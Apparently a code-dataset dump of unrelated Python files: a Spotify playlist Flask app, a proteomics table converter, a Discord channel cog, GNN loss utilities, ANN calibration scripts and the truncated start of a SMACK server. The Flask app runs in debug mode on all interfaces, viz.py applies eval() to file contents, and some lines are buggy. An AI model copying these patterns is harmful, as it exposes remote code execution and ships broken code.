auth_url = auth_manager.get_authorize_url()
return render_template('signIn.html',auth_url=auth_url)
# Step 4. Signed in, display data
return redirect('/home')
# @app.route('/')
@application.route('/home')
def index():
global spotify
global auth_manager
if not auth_manager.get_cached_token():
return redirect('/')
name = spotify.me()["display_name"]
return render_template('home.html',name=name)
@application.route('/sign_out')
def sign_out():
os.remove(session_cache_path())
session.clear()
return redirect('/')
@application.route('/playlists')
def playlists():
global spotify
global auth_manager
if not auth_manager.get_cached_token():
return redirect('/')
else:
playlists1 = spotify.current_user_playlists()
playlists = []
for x in playlists1['items']:
playlists.append(x['name'])
style = 'background: transparent;'
return render_template('playlists.html',style=style,playlists=playlists)
@application.route('/topArtists')
def topArtists():
global spotify
global auth_manager
if not auth_manager.get_cached_token():
return redirect('/')
else:
topArtists1 = spotify.current_user_top_artists(limit=50,time_range="long_term")
topArtists = []
for x in topArtists1['items']:
topArtists.append(x['name'])
return render_template('topArtists.html',topArtists=topArtists)
@application.route('/generatePlaylist')
def makePlaylist():
global spotify
global auth_manager
if not auth_manager.get_cached_token():
return redirect('/')
else:
data = 'We do not judge who you listen to'
return render_template('generatePlaylist.html',data=data)
@application.route('/generatePlaylist', methods=['POST'])
def my_form_post():
global spotify
text = request.form['artist']
results = spotify.search(text,1,0,"artist")
artist = results['artists']['items'][0]
artist_uri = artist['uri']
recommendations = spotify.recommendations(seed_artists=[artist_uri], limit=25)
track_list = recommendations['tracks']
list_of_songs = []
for tracks in track_list:
# print(tracks['name'])
list_of_songs.append(tracks['uri'])
#create playlist
playlist_name = 'Similar to ' + artist['name']
playlist_description = 'Songs similar to ' + artist['name']
spotify.user_playlist_create(user=spotify.me()["id"],name=playlist_name,public=True,description=playlist_description)
#identify id of newest playlist
prePlaylists = spotify.user_playlists(user=spotify.me()["id"])
playlist = prePlaylists['items'][0]['id']
#add 25 songs
spotify.user_playlist_add_tracks(user=spotify.me()["id"], playlist_id=playlist, tracks=list_of_songs)
data = 'Playlist similar to music by ' + artist['name'] + ' has been added'
return render_template('generatePlaylist.html',data=data)
def session_cache_path():
return caches_folder + session.get('uuid')
if __name__ =='__main__':
application.run(host='0.0.0.0',port=8080, debug=True)
``` |
{
"source": "jjgao/cbio-proteomics",
"score": 3
} |
#### File: jjgao/cbio-proteomics/ms2cbioportal.py
```python
import abc
import argparse
import re
import pickle
import numpy as np
import pandas as pd
BASE_ATTR = """
Parameters
----------
filename : str
The path and the name of the file.
sample_regex : str
A regex string for isolating sample columns.
ptm_type : str, None
The type of PTM (i.e. 'P' for phosphoprotein).
use_ruler : bool
Whether to use the proteomic ruler method.
Attributes
----------
df : pandas.DataFrame
A DataFrame containing the tabular experimental data.
"""
class MSTable(object):
"""Base class for all MS table types. This is an abstract class so it
cannot be implemented. Please see CDAPiTraqTable, CDAPPrecursorAreaTable,
MaxQuantProteomeTable, and/or MaxQuantPTMTable.
""" + BASE_ATTR
__metaclass__ = abc.ABCMeta
def __init__(self, filename, sample_regex, ptm_type=None, use_ruler=False):
# these are private attributes
self.use_ruler = use_ruler
self.self_path = __file__.split('/')[0] + '/'
# these are public attributes
self.df = pd.DataFrame()
# read in data from csv file
self.load_data(filename)
# perform tests for data columns and data length
self.check_data()
# clean and format the data
self.clean_rows()
self.format_genes(ptm_type)
self.clean_columns(sample_regex)
self.clean_values()
self.average_duplicates()
# transform data
if use_ruler:
self.proteomic_ruler()
def __repr__(self):
return str(self.df)
@property
def columns(self):
return self.df.columns
@property
def index(self):
return self.df.index
@property
def shape(self):
return self.df.shape
def head(self, n=5):
"""A wrapper for Pandas' `head` method.
Parameters
----------
n : int
Number of rows to return.
Returns
-------
head : pandas.DataFrame
The top `n` rows of the dataframe.
"""
head = self.df.head(n)
return head
def load_data(self, filename):
"""Load in a tab-separated experimental results file. Attaches the
DataFrame to the `df` attribute of the class.
Parameters
----------
filename : str
The path and the name of the input file.
Returns
-------
None
"""
try:
self.df = pd.read_csv(filename, sep='\t', header=0)
except OSError:
print('File {0} not found. Could not be converted into a Pandas dataframe.').format(filename)
raise
return
def clean_columns(self, sample_regex):
"""Isolate sample columns from the larger tabular data using
a regular expression. Modifies instance `df` attribute.
Parameters
----------
sample_regex : str
A regex string for isolating sample columns.
Returns
-------
None
"""
sample_columns = [col for col in self.df.columns if re.match(sample_regex, col)]
if not sample_columns:
raise ValueError('`sample_regex` was not able to find any columns.')
self.df = self.df[sample_columns]
return
@abc.abstractmethod
def check_data(self):
"""Method containing checks that the data and the columns used
for the processing exist. Requires method overloading."""
return
@abc.abstractmethod
def clean_rows(self):
"""Method that removes extraneous rows depending on the experiment
type. Requires method overloading."""
return
@abc.abstractmethod
def format_genes(self, ptm_type):
"""Method that rewrites the gene column and sets it as the index.
Requires method overloading."""
return
def clean_values(self):
"""Clean the data of `np.inf`.
Parameters
----------
None
Returns
-------
None
"""
self.df.replace((np.inf, -np.inf), np.nan, inplace=True)
return
def log_transform(self):
"""Log2 transform data.
Parameters
----------
None
Returns
-------
None
"""
self.df = np.log2(self.df + 1)
return
def proteomic_ruler(self):
"""Apply the proteomic ruler to the data to obtain copy number
per cell estimates based on Wiśniewski et al. 2014. Uses the formula:
Protein Copy Number = Protein MS Signal x (Avogadro's Number/Molar Mass)
x (DNA Mass/Histone MS Signal)
Parameters
----------
None
Returns
-------
None
"""
# check for negative values
min_val = np.nanmin(self.df.values)
if min_val < 0:
raise ValueError("""Negative values detected. Proteomic ruler only supports MS intensity values.
If this is a mistake, set use_ruler=False.""")
# load some constants
molar_mass = pickle.load(open(self.self_path + 'molar_mass.pkl', 'rb'))
avogadro = 6.022 * 10**23
dna_mass = 6.5 * 10**-12 # 6.5 pg
# get col of avogadro/molar mass
molar_col = []
for ind in self.df.index:
try:
molar_col.append(molar_mass[ind.split('|')[0]])
except KeyError:
molar_col.append(np.nan)
molar_col = pd.Series(molar_col)
molar_col.index = self.df.index
avo_mol = molar_col.rtruediv(avogadro)
# get row of sum of histones
hist_row = self.df[self.df.index.to_series().str.contains('HIST', na=False)].sum()
# apply equation
self.df = self.df.div(hist_row).multiply(avo_mol, axis=0).multiply(dna_mass)
return
def average_duplicates(self):
"""Average any duplicated sample columns by taking the mean across
the duplicate samples.
Parameters
----------
None
Returns
-------
None
"""
nondup_df = self.df[self.df.columns[~self.df.columns.duplicated(keep=False)]]
uniq_dup_cols = list(set(self.df.columns[self.df.columns.duplicated(keep=False)]))
dedup_df = pd.DataFrame(index=nondup_df.index, columns=uniq_dup_cols)
for col in uniq_dup_cols:
dedup_df[col] = self.df[col].nanmean(axis=1)
self.df = pd.concat((nondup_df, dedup_df), axis=1)
return
def rename_columns(self, renamer):
"""Rename all sample columns using a custom function.
Parameters
----------
renamer : function
A function that applies a transformation on each column name.
Returns
-------
None
"""
self.df.columns = [renamer(col) for col in self.df.columns]
return
def vertical_concat(self, table):
"""Concatenate data from two experiments together by vertical concatenation.
This is for combining proteins and PTMs from the same tissue type. It will
not average duplicate genes.
Parameters
----------
table : ms2cbioportal.MSTable
An instance derived from `MSTable`.
Returns
-------
None
"""
self.df = pd.concat((self.df, table.df), axis=0)
return
def horizontal_concat(self, table):
"""Concatenate data from two experiments together by horizontal concatenation.
This is for combining the same experiment type but with two (or more, since
you can chain the concatenation) sample sets.
Parameters
----------
table : ms2cbioportal.MSTable
An instance derived from `MSTable`.
Returns
-------
None
"""
self.df = pd.concat((self.df, table.df), axis=1)
return
def write_csv(self, filename):
"""Write finished DataFrame to file.
Parameters
----------
filename : str
The path and the name of the output file.
Returns
-------
None
"""
self.df.to_csv(filename, sep='\t', header=True, index=True)
return
class CDAPTable(MSTable):
"""Base class for all CDAP table types. Please see CDAPiTraqTable, CDAPPrecursorAreaTable.
""" + BASE_ATTR
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def check_data(self):
"""Method containing checks that the data and the columns used
for the processing exist. Checks for 'Gene' columns and the presence
of multiple rows.
Parameters
----------
None
Returns
-------
None
"""
assert len(self.df.index) > 0
assert 'Gene' in self.df.columns
return
def clean_rows(self):
"""Method that removes extraneous rows. For CDAP experiments, rows with 'Mean',
'Median', and 'StdDev' are mixed in with genes in the 'Gene' column.
Parameters
----------
None
Returns
-------
None
"""
self.df = self.df[~self.df['Gene'].str.contains('Mean|Median|StdDev', na=True)]
return
def format_genes(self, ptm_type):
"""Method that rewrites the gene column and sets it as the index. First checks
to see if the table is a PTM by checking for the associated name (only phosphosites
supported at this time for CDAP). PTMs are built using the format
GENE|GENE_<ptm_type><amino acid><amino acid site>
Multi-site PTMs are chained with underscores. Otherwise, the gene is
formatted as
GENE|GENE
Parameters
----------
ptm_type : str
A string indicating the PTM type, i.e. 'P'
Returns
-------
None
"""
ptm_name = {
'P' : 'Phosphosite',
}
if ptm_type and ptm_name[ptm_type] in self.df.columns:
anno = []
for g, ph in zip(self.df['Gene'], self.df[ptm_name[ptm_type]]):
ptm_site = ph.split(':')[1]
ptm_build = re.sub('[A-Z]+', lambda m: '_'+m.group(0), ptm_site.upper())[1:]
anno.append('{0}|{0}_{1}{2}'.format(g, ptm_type, ptm_build))
else:
anno = ['{0}|{0}'.format(g) for g in self.df['Gene']]
self.df.index = anno
self.df.index.names = ['Hugo_Symbol']
return
class CDAPiTraqTable(CDAPTable):
"""Class for CDAP experiments for proteome and PTM quantification using iTRAQ.
""" + BASE_ATTR
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class CDAPPrecursorAreaTable(CDAPTable):
"""Class for CDAP experiments for proteome and PTM quantification using intensities.
""" + BASE_ATTR
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if not self.use_ruler:
self.log_transform()
class MaxQuantProteomeTable(MSTable):
"""Class for MaxQuant experiments for proteome MS quantification.
""" + BASE_ATTR
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def check_data(self):
"""Method containing checks that the data and the columns used
for the processing exist. Checks for the presence of multiple rows.
Also checks for 'Protein IDs', 'Gene names', and 'Q-value' columns.
Parameters
----------
None
Returns
-------
None
"""
assert len(self.df.index) > 0
assert all(col in self.df.columns for col in ('Protein IDs',
'Gene names',
'Q-value'))
return
def clean_rows(self):
"""Method that removes extraneous rows. For MaxQuant proteome quantification,
it takes out rows with 'REV' or 'CON' and rows with a 'Q-value' over 0.05.
Parameters
----------
None
Returns
-------
None
"""
self.df = self.df[~self.df['Protein IDs'].str.contains('REV|CON', na=True)]
self.df = self.df[pd.notnull(self.df['Gene names'])]
self.df = self.df[self.df['Q-value'] < 0.05]
return
def format_genes(self, ptm_type):
"""Method that rewrites the gene column and sets it as the index. Format
used is 'GENE|GENE'.
Parameters
----------
ptm_type : str
A string indicating the PTM type, i.e. 'P'
Returns
-------
None
"""
anno = ['{0}|{0}'.format(g.split(';')[0]) for g in self.df['Gene names']]
self.df.index = anno
self.df.index.names = ['Hugo_Symbol']
return
class MaxQuantPTMTable(MSTable):
"""Class for MaxQuant experiments for PTM MS quantification.
""" + BASE_ATTR
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def check_data(self):
"""Method containing checks that the data and the columns used
for the processing exist. Checks for the presence of multiple rows.
Also checks for 'Protein', 'Amino acid', 'Positions within proteins',
'Gene names', and 'Localization prob' columns.
Parameters
----------
None
Returns
-------
None
"""
assert len(self.df.index) > 0
assert all(col in self.df.columns for col in ('Protein',
'Amino acid',
'Positions within proteins',
'Gene names',
'Localization prob'))
return
def clean_rows(self):
"""Method that removes extraneous rows. For MaxQuant PTM quantification,
it takes out rows with 'REV' or 'CON', rows with a null 'Gene names' entry,
and rows where 'Localization prob' is less than 0.75.
Parameters
----------
None
Returns
-------
None
"""
self.df = self.df[~self.df['Protein'].str.contains('REV|CON', na=True)]
self.df = self.df[pd.notnull(self.df['Gene names'])]
self.df = self.df[self.df['Localization prob'] > 0.75]
return
def format_genes(self, ptm_type):
"""Method that rewrites the gene column and sets it as the index. Phosphosites
are built using the format 'GENE|GENE_P<ptm_type><amino acid site>'.
Parameters
----------
ptm_type : str
A string indicating the PTM type, i.e. 'P'
Returns
-------
None
"""
prot_pos = [p.split(';')[0] for p in self.df['Positions within proteins']]
aa_col = self.df['Amino acid'].tolist()
genes = [g.split(';')[0] for g in self.df['Gene names']]
anno = []
for g, aa, pos in zip(genes, aa_col, prot_pos):
anno.append('{0}|{0}_{1}{2}{3}'.format(g, ptm_type, aa, pos))
self.df.index = anno
self.df.index.names = ['Hugo_Symbol']
return
META_TEXT = """cancer_study_identifier: {0}
genetic_alteration_type: PROTEIN_LEVEL
datatype: Z-SCORE
stable_id: protein_quantification
profile_description: Protein Quantification (Mass Spec)
show_profile_in_analysis_tab: true
profile_name: Protein levels (mass spectrometry by CPTAC)
data_filename: {1}"""
class MSMeta(object):
"""A class for building metadata for MSTable derived classes.
Parameters
----------
cancer_id : str
Cancer ID string supplied by cBioPortal (i.e. 'brca_tcga').
prot_file : str
Path and filename of the file generated by MSTable derived classes.
"""
def __init__(self, cancer_id, prot_file):
self.text = META_TEXT.format(cancer_id, prot_file)
def __repr__(self):
return self.text
def write(self, filename):
"""Write finished metadata to file.
Parameters
----------
filename : str
The path and the name of the output file.
Returns
-------
None
"""
with open(filename, 'w') as f:
f.write(self.text)
return
``` |
{
"source": "JJgar2725/meowBot",
"score": 3
} |
#### File: meowBot/Cogs/creation.py
```python
import discord
from discord.ext import commands
# cog for storing creation commands
class Creation(commands.Cog):
# constructor
def __init__(self, bot):
self.bot = bot
# command to create a basic text channel
@commands.group(invoke_without_command=True)
@commands.has_permissions(manage_channels=True)
async def create(self, ctx, *, channel_name: str):
channel = await ctx.guild.create_text_channel(channel_name)
await channel.send("Text channel {} was created!".format(channel_name))
# command to create a basic voice channel
@create.command()
@commands.has_permissions(manage_channels=True)
async def voice(self, ctx, *, channel_name: str):
channel = await ctx.guild.create_voice_channel(channel_name)
await ctx.send("Voice channel {} was created!".format(channel_name))
# command to create a private text channel
@create.command()
@commands.has_permissions(manage_channels=True)
async def priv(self, ctx, *, channel_name: str):
# find needed roles and store them in variables for later use
admin = discord.utils.get(ctx.guild.roles, name="Supreme Piano Ruler")
mods = discord.utils.get(ctx.guild.roles, name="Black Keys")
# using a dictionary, permissions can be chosen for the new channel
overwrites = {
ctx.guild.default_role: discord.PermissionOverwrite(read_messages=False),
ctx.guild.me: discord.PermissionOverwrite(read_messages=True),
admin: discord.PermissionOverwrite(read_messages=True),
mods: discord.PermissionOverwrite(read_messages=True)
}
channel = await ctx.guild.create_text_channel(channel_name, overwrites=overwrites)
await channel.send("Private text channel {} was created!".format(channel_name))
# command to create a private voice channel
@create.command()
@commands.has_permissions(manage_channels=True)
async def priv_voice(self, ctx, *, channel_name: str):
admin = discord.utils.get(ctx.guild.roles, name="Supreme Piano Ruler")
mods = discord.utils.get(ctx.guild.roles, name="Black Keys")
overwrites = {
ctx.guild.default_role: discord.PermissionOverwrite(read_messages=False),
ctx.guild.me: discord.PermissionOverwrite(read_messages=True),
admin: discord.PermissionOverwrite(read_messages=True),
mods: discord.PermissionOverwrite(read_messages=True)
}
channel = await ctx.guild.create_voice_channel(channel_name, overwrites=overwrites)
await ctx.send("Private voice channel {} was created!".format(channel_name))
# command to delete a given channel
@commands.command()
@commands.has_permissions(manage_channels=True)
async def delete(self, ctx, *, channel_name: str):
# search through channels on a guild for given channel name
channel = discord.utils.get(ctx.guild.channels, name=channel_name)
await channel.delete()
await ctx.send("Channel {} was deleted!".format(channel_name))
# setup method to add bot
def setup(bot):
bot.add_cog(Creation(bot))
``` |
{
"source": "jjgarau/GNND",
"score": 3
} |
#### File: jjgarau/GNND/util.py
```python
import torch
import numpy as np
import matplotlib.pyplot as plt
from torch_geometric.data import Data
from torch_geometric_temporal.nn import *
def mape_loss(output, label):
return torch.mean(torch.abs(torch.div((output - label), label)))
def mse_loss(output, label, mean=None):
return torch.mean(torch.square(output - label))
def msse_loss(output, label, mean=None):
return torch.mean(torch.div(torch.square(output - label), label + 1))
def rmse_loss(output, label):
return torch.sqrt(torch.mean(torch.square(output - label)))
def mae_loss(output, label):
return torch.mean(torch.abs(output - label))
def mase_loss(output, label, mean=None):
mean = mean.reshape(output.shape)
label_mean = torch.mean(label)
if not mean is None:
return torch.mean(torch.abs(output - label) / mean)
elif label_mean == 0:
return torch.mean(torch.abs(output - label))
else:
return torch.mean(torch.abs(output - label)) / label_mean
def mase1_loss(output, label, mean=None):
# Extreme 1: all countries equal
# L_i = (x_i - y_i)^2 / y_i
# L = (L_1 + L_2 + … + L_N) / N
label = label[:, 0]
output = output.reshape(output.shape[0])
label_mean = torch.mean(label)
if not mean is None:
return torch.mean(torch.abs(output - label) / mean)
if label_mean == 0:
return torch.mean(torch.abs(output - label))
else:
return torch.mean(torch.abs(output - label)) / label_mean
def mase2_loss(output, label, mean=None):
# Extreme 2: all people equal
# X = (x_1 + x_2 + … + x_N)
# Y = (y_1 + y_2 + … + y_N)
# L = (X - Y)^2 / Y
label = label[:, 0]
X = torch.sum(output)
Y = torch.sum(label)
if Y == 0 and not mean is None:
return torch.abs(X - Y) / torch.sum(mean)
elif Y == 0:
return torch.abs(X - Y)
else:
return torch.abs(X - Y) / Y
def anti_lag_loss(output, label, lagged_label, mean=None, loss_func=mase2_loss, penalty_factor=0.1):
output = output.reshape(output.shape[0])
lagged_label = lagged_label.reshape(lagged_label.shape[0])
# Or instead of penalty factor (or with it) should I be using the same loss function and taking the inverse square of that to ensure good scaling?
penalty = torch.mean(torch.div(1, torch.square(output - lagged_label)))
return loss_func(output, label, mean=mean) + penalty * penalty_factor
def lag_factor(output, lagged_label):
return torch.div(torch.abs(output - lagged_label), lagged_label)
def mase3_loss(output, label, populations, mean=None, k=500000):
# Middle point: consider a population threshold k
# x_k = sum(x_i) such that country i has less than k population
# y_k = sum(y_i) such that country i has less than k population
# L_i = (x_i - y_i)^2 / y_i for countries i with more than k population
# L_k = (x_k - y_k)^2 / y_k
# L = L_k + sum(L_i)
label = label[:, 0]
if mean is None:
mean = torch.mean(label)
if sum(mean) == 0:
mean = 1
large_outputs = []
large_labels = []
large_means = []
small_outputs = []
small_labels = []
small_means = []
for i in range(len(populations)):
if populations[i] < k:
small_outputs.append(output[i])
small_labels.append(label[i])
small_means.append(mean[i])
else:
large_outputs.append(output[i])
large_labels.append(label[i])
large_means.append(mean[i])
x_k = sum(small_outputs)
y_k = sum(small_labels)
L_i = torch.abs(torch.FloatTensor(large_outputs) - torch.FloatTensor(large_labels)) / torch.FloatTensor(large_means)
L_k = abs(x_k - y_k) / sum(small_means)
return L_k + torch.sum(L_i)
def inv_reg_mase_loss(output, label):
return mase_loss(output, label) + torch.mean(torch.div(1, output))
def train_gnn(model, loader, optimizer, loss_func, device):
model.train()
loss_all = 0
for data in loader:
data = data.to(device)
optimizer.zero_grad()
output = model(data)
label = data.y.to(device)
output = torch.reshape(output, label.shape)
loss = loss_func(output, label)
loss.backward()
loss_all += data.num_graphs * loss.item()
optimizer.step()
return loss_all
def evaluate_gnn(model, loader, device):
model.eval()
predictions, labels = [], []
with torch.no_grad():
for data in loader:
data = data.to(device)
pred = model(data).detach().cpu().numpy()
label = data.y.detach().cpu().numpy()
pred = pred.reshape(label.shape)
predictions.append(pred)
labels.append(label)
p = np.vstack(predictions)
l = np.vstack(labels)
return np.mean(np.abs(p - l)) / np.mean(l) #np.mean(abs((labels - predictions) / labels)) #reporting loss function, different from training
def evaluate_gnn_recurrent(model, dataset, lookback_pattern, loss_func):
predictions, labels, losses = [], [], []
def forward(snapshot, h, c, detach=False):
if type(model) is GConvLSTM or type(model) is GConvGRU:
h, c = model(snapshot.x, snapshot.edge_index, snapshot.edge_attr[:, 0], h, c)
if detach:
h = h.detach()
c = c.detach()
return h, h, c
else:
return model(snapshot, h, c)
model.eval()
with torch.no_grad():
cost = 0
for time, snapshot in enumerate(dataset):
h, c = None, None
for sub_time in range(len(lookback_pattern)):
sub_snapshot = Data(x=snapshot.x[:, sub_time:sub_time + 1], edge_index=snapshot.edge_index,
edge_attr=snapshot.edge_attr)
y_hat, h, c = forward(sub_snapshot, h, c, detach=True)
predictions.append(y_hat)
labels.append(snapshot.y)
cost += loss_func(y_hat, snapshot.y)
cost /= time + 1
cost = cost.item()
losses.append(cost)
return predictions, labels, losses
def show_predictions(predictions, labels):
# Plot predictions and labels over time
x = np.arange(0, len(predictions['train']))
plt.title('COVID Europe Dataset')
plt.xlabel("Time (days)")
plt.ylabel("New Cases")
plt.plot(x, [torch.mean(p) for p in predictions['train']], label="Predictions")
plt.plot(x, [torch.mean(l) for l in labels['train']], label="Labels")
# plt.plot(x, [1000*mase_loss(predictions[i], labels[i]) for i in range(len(predictions))], label="Loss")
plt.legend()
plt.show()
def show_loss_by_country(predictions, labels, nations, plot=True):
losses = {}
if plot:
# Plot loss by country over time
x = np.arange(0, len(predictions))
plt.title('Loss by Country')
plt.xlabel("Time (days)")
plt.ylabel("MASE Loss")
for i in range(len(nations)):
# Compute MAE loss for each example
loss = [float(mae_loss(predictions[time][i], labels[time][i])) for time in range(len(predictions))]
losses[nations[i]] = loss
if plot:
plt.plot(x, loss, label=nations[i])
if plot:
plt.show()
return losses
def show_labels_by_country(labels, nations):
# Plot labels by country over time
x = np.arange(0, len(labels))
plt.title('New Cases by Country')
plt.xlabel("Time (days)")
plt.ylabel("New COVID Cases")
for i in range(5):
label = [torch.mean(l[i]) for l in labels]
plt.plot(x, label, label=nations[i])
print(nations[i] + ": " + str(int(sum(label)/len(label))))
plt.show()
``` |
{
"source": "jjgarciac/ANN-Calibration",
"score": 3
} |
#### File: jjgarciac/ANN-Calibration/data_viz.py
```python
import tensorflow as tf
import data_loader
import matplotlib.pyplot as plt
from matplotlib.colors import to_rgb, to_rgba
import numpy as np
def scatter(x, y, color, alphas, **kwarg):
#r, g, b = to_rgb(color)
# r, g, b, _ = to_rgba(color)
# Color map I want to use
cm = plt.cm.get_cmap('brg')
# Get the colormap colors for my data
my_cmap = cm(plt.Normalize(color.min(), color.max())(color))
# Set alpha
my_cmap[:, -1] = alphas
# Create new colormap
#my_cmap = ListedColormap(my_cmap)
#color = [(r, g, b, alpha) for alpha in alpha_arr]
plt.scatter(x, y, color=my_cmap, edgecolors='black', **kwarg)
X, Y = data_loader.make_toy_Story(45)
Y_oh = tf.one_hot(Y, len(np.unique(Y)), dtype=tf.float32, off_value=0.0001).numpy()
X_tmp = np.zeros_like(X)
Y_oh_tmp = np.zeros_like(Y_oh)
for i in range(2):
p = np.random.permutation(len(X))
X_tmp = .7*X_tmp + .3*X[p]
Y_oh_tmp = .7*Y_oh_tmp + .3*Y_oh[p]
X = np.concatenate([X, X_tmp], axis=0)
Y_oh = np.concatenate([Y_oh, Y_oh_tmp], axis=0)
#X = np.concatenate([X, X_tmp])
#Y_oh = np.concatenate([Y_oh, Y_oh_tmp])
alpha = 1-(np.sum(np.log(Y_oh)*Y_oh, axis=1)/np.log(.2))
c = np.sum(np.arange(Y_oh.shape[1]+1)[1:]*Y_oh, axis=1)
scatter(X[:, 0], X[:, 1], c, alpha)
plt.show()
```
#### File: ANN-Calibration/model/models.py
```python
import tensorflow as tf
import tensorflow.keras as tfk
from tensorflow.keras.layers import Dense
import math
from metrics import *
def gauss_pdf(x, name=None):
return (1/tf.sqrt(2*math.pi))*tf.math.exp((-tf.pow(x, 2))/2)
def build_model(in_shape, out_shape, manifold_mixup=False):
if manifold_mixup:
model = ManifoldMixup(hidden_layers=[64,64,64,64], output_shape=out_shape)
else:
model = tfk.Sequential([
Dense(128, activation='relu', input_shape=(in_shape,)),
Dense(128, activation='relu'),
Dense(out_shape)
])
optimizer = tfk.optimizers.Adam()
loss = tfk.losses.CategoricalCrossentropy(from_logits=True)
metrics = [ECE_metrics(name='ECE', num_of_bins=10),
OE_metrics(name='OE', num_of_bins=10),
tfk.metrics.CategoricalAccuracy('accuracy', dtype=tf.float32),]
model.compile(optimizer=optimizer,
loss=loss,
metrics=metrics,
run_eagerly=True)
return model
```
#### File: jjgarciac/ANN-Calibration/viz.py
```python
import utils
import data_loader
import tensorflow as tf
import numpy as np
import argparse
import utils
import pandas as pd
import models
import matplotlib.pyplot as plt
import os
from argparse import Namespace
from sklearn.model_selection import train_test_split
def isfloat(x):
try:
a = float(x)
except (TypeError, ValueError):
return False
else:
return True
def isint(x):
try:
a = float(x)
b = int(a)
except (TypeError, ValueError):
return False
else:
return a == b
def get_model_url(model, dataset, id):
return os.path.join('./experiments_buffer', *[model, dataset, id])
def old_load_args(url):
parser = argparse.ArgumentParser()
#parser.add_argument('--a', default=1)
#args = parser.parse_args()
args=None
args_url = os.path.join(url, 'args.txt')
if os.path.exists(args_url):
with open(args_url, 'r') as f:
ns = f.read()
args = parser.parse_args(namespace=eval(ns))
return args
def load_args(url):
parser = argparse.ArgumentParser()
args={}
args_url = os.path.join(url, 'args.txt')
if os.path.exists(args_url):
with open(args_url, 'r') as f:
ns = f.read()
for arg in ns[10:].split(','):
arg = arg.split('=')
arg[1] = arg[1].strip('\'')
arg[1] = arg[1].rstrip(')')
v = arg[1]
if(arg[1]=='True'):
v=True
if(arg[1]=='False'):
v=False
if(isfloat(arg[1])):
v=float(arg[1])
if(isint(arg[1])):
v=int(arg[1])
args[arg[0].strip()]=v
return Namespace(**args)
def load_data(args):
data = data_loader.load(args.dataset,
n_train=args.n_train,
n_test=args.n_test,
train_noise=args.train_noise,
test_noise=args.test_noise)
stratify = args.dataset not in ["abalone", "segment"]
if args.dataset not in ['arcene', 'moon', 'toy_Story', 'toy_Story_ood', 'segment']:
print(args.dataset)
x = data_loader.prepare_inputs(data['features'])
y = data['labels']
x_train, x_test, y_train, y_test = train_test_split(x,
y,
train_size=args.train_test_ratio,
stratify=y if stratify else None)
else:
if args.dataset == 'moon' or args.dataset=='toy_Story' or \
args.dataset=='toy_Story_ood':
x_train, x_test = data['x_train'], data['x_val']
else:
x_train, x_test = data_loader.prepare_inputs(data['x_train'], data['x_val'])
y_train, y_test = data['y_train'], data['y_val']
# Generate validation split
x_train, x_val, y_train, y_val = train_test_split(x_train,
y_train,
train_size=args.train_test_ratio,
stratify=y_train if stratify else None)
x_train = x_train.astype(np.float32)
x_val = x_val.astype(np.float32)
x_test = x_test.astype(np.float32)
n_mean = np.mean(x_train, axis=0)
n_std = np.var(x_train, axis=0)**.5
x_train = (x_train-n_mean)/n_std
x_val = (x_val-n_mean)/n_std
x_test = (x_test-n_mean)/n_std
try:
if args.n_ood>0 and y_val.shape[1]>args.n_ood:
n_ood = y_val.shape[1]-args.n_ood-1
return utils.prepare_ood(x_train, x_val, x_test, y_train, y_val, y_test, n_ood, args.norm)
except AttributeError:
#print(x_train, x_val, x_test, y_train, y_val, y_test)
return x_train, x_val, x_test, y_train, y_val, y_test, 0, 0
return x_train, x_val, x_test, y_train, y_val, y_test, 0, 0
def load_model(url, in_shape, out_shape, args):
checkpoint_filepath = os.path.join(url, 'ckpt')
model = models.build_model(in_shape, out_shape, args.model, args)
model.load_weights(checkpoint_filepath)
return model
def leave_cvx_hull(model_list, x, y):
fig, axs = plt.subplots(1, 3)
fig.suptitle('Leaving cvx hull')
for i, y_lbl in enumerate(['accuracy', 'confidence', 'entropy']):
for model in model_list:
y_list = []
for u in range(0, 100):
y_plot=0
t = np.random.uniform(size=x.shape)
py_x = tf.nn.softmax(model(x + u*t))
if y_lbl=='entropy':
y_plot = -tf.reduce_mean(tf.reduce_sum(py_x*tf.math.log(py_x), axis=1))
if y_lbl=='accuracy':
y_plot = tf.reduce_mean(tf.cast(
tf.argmax(py_x, axis=1)==tf.argmax(y, axis=1), tf.float32))
if y_lbl=='confidence':
y_plot = tf.reduce_mean(tf.reduce_max(py_x, 1))
y_list.append(y_plot.numpy())
axs[i].plot(np.array(y_list), label=model.name)
axs[i].set(xlabel='perturbation', ylabel=y_lbl+' (mean)')
axs[i].legend()
def confidence_plot(model, x, xo):
p_in = tf.max(tf.nn.softmax(model(x)), axis=1)
p_out = tf.max(tf.nn.softmax(model(xo)), axis=1)
plt.ylabel('Frequency')
plt.xlabel('Confidence')
plt.xlim([0, 1])
plt.hist(p_in, bins=20, color='blue', label='In', alpha=.5)
plt.hist(p_out, bins=20, color='red', label='Out', alpha=.5)
plt.legend()
return 0
def calibration_plot(model, x, y, ece):
py_x = tf.nn.softmax(model(x))
p = tf.max(py_x, axis=1)
hat_y = tf.argmax(py_x, axis=1)
y = tf.argmax(y, axis=1)
acc = tf.cast(hat_y==y, tf.float32)
idx = tf.argsort(p)
p = p[idx]
acc = acc[idx]
plt.title(f'Calibration {model.name}: {ece}')
plt.ylabel('Frequency')
plt.xlabel('ACC/Conf')
plt.xlim([0, 1])
plt.hist(acc, bins=20, color='blue', label='accuracy', alpha=.5)
plt.hist(p, bins=20, color='red', label='confidence', alpha=.5)
plt.legend()
return 0
def analyze_features(model, x, xo, idx):
plt.hist(x[:, idx], bins=20, color='blue', label='sample', alpha=.5)
plt.hist(xo[:, idx], bins=20, color='red', label='ood', alpha=.5)
if model.name in ['jemo', 'jehmo']:
xgo = model.sample_ood(x)
plt.hist(xgo[:, idx], bins=20, color='green', label='gen_o', alpha=.5)
plt.legend()
return 0
``` |
{
"source": "jjgarzella/smack",
"score": 3
} |
#### File: smack/rise4fun/smack_server.py
```python
import BaseHTTPServer
import SimpleHTTPServer
import json
import subprocess
import os, time, re
import random
PORT = 8080
version = "1.4.4"
rise_simple = """#include "smack.h"
//__VERIFIER_nondet() : Is used to permit assigned memory to have unconstrained values
//assume(): Is used to enforce constraints on specified regions of memory
//assert(): Is used to prove some assertions on values in the program. Assertions may contain unconstrained values.
int main() {
int x = __VERIFIER_nondet();
int n = __VERIFIER_nondet();
assume(n>0);
assert(x+n > x);
return 0;
}"""
rise_simple_buggy = """#include "smack.h"
